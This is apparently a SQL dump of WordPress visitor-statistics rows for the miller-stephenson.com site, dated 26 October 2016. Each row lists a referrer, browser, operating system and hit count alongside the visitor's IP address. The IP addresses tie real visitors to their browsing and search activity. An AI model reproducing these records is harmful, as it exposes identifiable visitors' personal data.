INSERT INTO `wp_statistics_visitor` VALUES (12029, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12030, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.154.70.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12031, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.173.191.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12032, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.185.24.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12033, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.18.224.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12034, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.29.77.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12035, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '8.0', '', '91.134.1.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12036, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.247.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12037, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.66.46.218', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12038, '2016-10-26', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&sqi=2&ved=0ahUKEwjf8-S2mfjPAhUjI8AKHVdtANcQjBAIJTAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fcontact%2F&usg=AFQjCNE8T3eWNAa7jFCvKjHO-SI6GhqPtQ&bvm=bv.136593572,d.d24', 'MSIE', 'Windows', '11.0', '', '62.232.205.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12039, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.111.188.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12040, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.242.254.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12041, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.25.121.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12042, '2016-10-26', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '119.160.193.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12043, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.185.29.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12044, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.255.40.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12045, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '180.168.176.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12046, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.100.85.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12047, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.140.203.206', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12048, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.172.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12049, '2016-10-26', 'https://www.google.com.pk/', 'Chrome', 'Windows', '54.0.2840.71', '', '39.49.57.236', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12050, '2016-10-26', '(null)', 'Firefox', 'Windows', '33.0', '', '107.170.96.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12051, '2016-10-26', '(null)', 'Firefox', 'Windows', '33.0', '', '104.236.222.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12052, '2016-10-26', '(null)', 'Firefox', 'Windows', '33.0', '', '159.203.4.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12053, '2016-10-26', '(null)', 'Firefox', 'Windows', '33.0', '', '162.243.5.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12054, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.248.184.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12055, '2016-10-26', '(null)', 'Firefox', 'Windows', '33.0', '', '192.34.60.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12056, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.235.61.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12057, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12058, '2016-10-26', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12059, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.30.195.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12060, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.233.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12061, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.200.101.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12062, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.182.105.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12063, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.141.62.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12064, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '45.55.223.35', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12065, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.183.22.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12066, '2016-10-26', 'https://www.miller-stephenson.com/chemicals/lubricants/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12067, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.40.253.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12068, '2016-10-26', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '61.238.99.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12069, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.232.55.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12070, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.149.207.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12071, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.136.74.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12072, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.253.12.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12073, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '192.168.1.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12074, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.38.136.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12075, '2016-10-26', 'https://www.bing.com/search?q=ms-122ra&qs=n&form=QBRE&pq=ms-122ra&sc=8-8&sp=-1&sk=&cvid=F9A5F70726D244388E7F3829C7BA642E', 'MSIE', 'Windows', '11.0', '', '204.76.113.51', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12076, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.250.149.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12077, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.56.9.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12078, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjOpd3Zq_jPAhWRW34KHT9dDQoYABAA&sig=AOD64_2cZH-WEfTODNlMc7rGi5mJBOakqg&rct=j&frm=1&q=&ved=0ahUKEwib0drZq_jPAhXIjFQKHVlxBEI4ChDRDAga&adurl=', 'MSIE', 'Windows', '10.0', '', '199.89.130.52', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12079, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.177.240.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12080, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.122.28.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12081, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.18.165.129', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12082, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.164.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12083, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.88.222.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12084, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.98.138.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12085, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.78.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12086, '2016-10-26', 'https://www.google.co.il/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&cad=rja&uact=8&ved=0ahUKEwjg-cCmrfjPAhWGVhQKHY7nAy0QFgg7MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-815c%2F&usg=AFQjCNGBhFPZy83Wvi4ze28ZHEHlBywcdA&sig2=7OuT9YbDrfFxzWKulcjFPQ&bvm=bv.136593572,d.bGg', 'MSIE', 'Windows', '11.0', '', '193.169.70.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12087, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.174.5.47', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12088, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.30.235.171', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12089, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.248.71.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12090, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.106.244.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12091, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.109.53.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12092, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.161.152.20', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12093, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.147.168.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12094, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '50.0', '', '115.115.183.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12095, '2016-10-26', 'https://www.google.com.br/', 'Safari', 'iPhone', '8.0', '', '177.79.11.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12096, '2016-10-26', 'https://www.google.com/', 'Unknown', 'Unknown', 'Unknown', '', '14.33.246.210', '000', 45, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12097, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.26.236.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12098, '2016-10-26', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '188.208.1.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12099, '2016-10-26', 'https://www.google.co.th/', 'Chrome', 'Windows', '52.0.2743.116', '', '171.96.244.98', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12100, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.215.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12101, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '136.243.179.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12102, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwj4k4rQtfjPAhXO0RoKHfdjAbYQFgg3MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw&bvm=bv.136593572,d.bGg', 'MSIE', 'Windows', '11.0', '', '141.6.11.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12103, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '192.3.145.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12104, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.248.112.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12105, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.32.58.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12106, '2016-10-26', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '151.243.55.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12107, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 63, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12108, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwiZ4ImhuPjPAhUF5CYKHTxSDT0QFgg5MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-907-two-part-epoxy-adhesive%2F&usg=AFQjCNG-RsF8ufC-UmC2iZIs3mMktO4dqg', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12109, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.161.150.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12110, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.134.11.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12111, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'iPhone', '54.0.2840.66', '', '75.84.178.30', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12112, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.116.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12113, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.222.88.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12114, '2016-10-26', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '69.157.180.245', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12115, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwil8Le7uvjPAhWHbH4KHQH2AucYABAA&sig=AOD64_0ojJLb5gHYb1wGZTDLPA5BTJhJZA&rct=j&q=&ved=0ahUKEwjbw6y7uvjPAhXGr1QKHZRsAPoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '68.117.98.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12116, '2016-10-26', 'https://www.miller-stephenson.com/product/ms-907-two-part-epoxy-adhesive/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12117, '2016-10-26', 'https://www.google.com/', 'Safari', 'iPod', '9.0', '', '208.108.110.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12118, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.222.85.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12119, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.242.61.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12120, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '195.122.197.202', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12121, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '28.0.1500.71', '', '72.14.199.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12122, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '28.0.1500.71', '', '72.14.199.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12123, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.173.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12124, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.188.124.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12125, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.93.189.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12126, '2016-10-26', 'https://www.google.co.za/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&sqi=2&ved=0ahUKEwieuZDtvfjPAhUH4D4KHVg6ASoQFggmMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-1002f%2F&usg=AFQjCNGgNrqaF2vgrYHD61ce1zFvkyqvCw&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '178.15.151.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12127, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '206.130.125.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12128, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12129, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12130, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.46.191.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12131, '2016-10-26', 'https://www.bing.com/search?q=miller+stephenson+EPIKURE3223&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '10.0.100.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12132, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '107.77.106.34', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12133, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.0.172.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12134, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12135, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.101.202.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12136, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '63.84.194.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12137, '2016-10-26', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '49.0', '', '65.51.62.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12138, '2016-10-26', 'https://www.miller-stephenson.com', 'www', 'Unknown', 'Unknown', '', '65.51.62.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12139, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.207.137.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12140, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 145, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12141, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.112.143.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12142, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiii5j9wfjPAhVQPIEKHW0-DcQYABAA&sig=AOD64_1J0Oyv0W97_LTgGgwOdPuBOFqESQ&rct=j&q=&ved=0ahUKEwjNzJT9wfjPAhXHGD4KHRNUCJ8Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '173.15.190.57', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12143, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.69.154.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12144, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.61.100.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12145, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjw_K-WxPjPAhXBiRoKHdl7AewQFgg5MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw', 'MSIE', 'Windows', '11.0', '', '193.18.92.162', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12146, '2016-10-26', 'https://www.google.ca/', 'Chrome', 'Windows', '51.0.2704.106', '', '96.125.139.162', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12147, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.20.50.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12148, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjOuraexvjPAhUB8j4KHUpwC5cQFgg2MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '66.216.161.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12149, '2016-10-26', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '8.0', '', '62.24.222.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12150, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '192.3.128.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12151, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '68.193.188.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12152, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.185.25.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12153, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.210.45.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12154, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12155, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.237.2.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12156, '2016-10-26', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '49.0', '', '91.99.40.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12157, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.80.75.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12158, '2016-10-26', 'https://www.google.co.uk/', 'Chrome', 'Windows', '54.0.2840.71', '', '82.69.44.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12159, '2016-10-26', 'https://www.google.pl/', 'Chrome', 'Windows', '53.0.2785.143', '', '185.75.3.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12160, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.21.242.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12161, '2016-10-26', 'https://plus.url.google.com/url?sa=j&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resins%2F&uct=1474137434&usg=AUNeCJPT8AHi955KMHv4Rss0ZpQ.', 'Firefox', 'Windows', '49.0', '', '209.179.28.91', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12162, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.9.93.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12163, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '206.127.172.117', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12164, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.150.167.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12165, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 106, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12166, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '197.211.63.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12167, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12168, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '213.61.228.100', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12169, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.100.143.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12170, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.42.151.118', '000', 2, 0); 
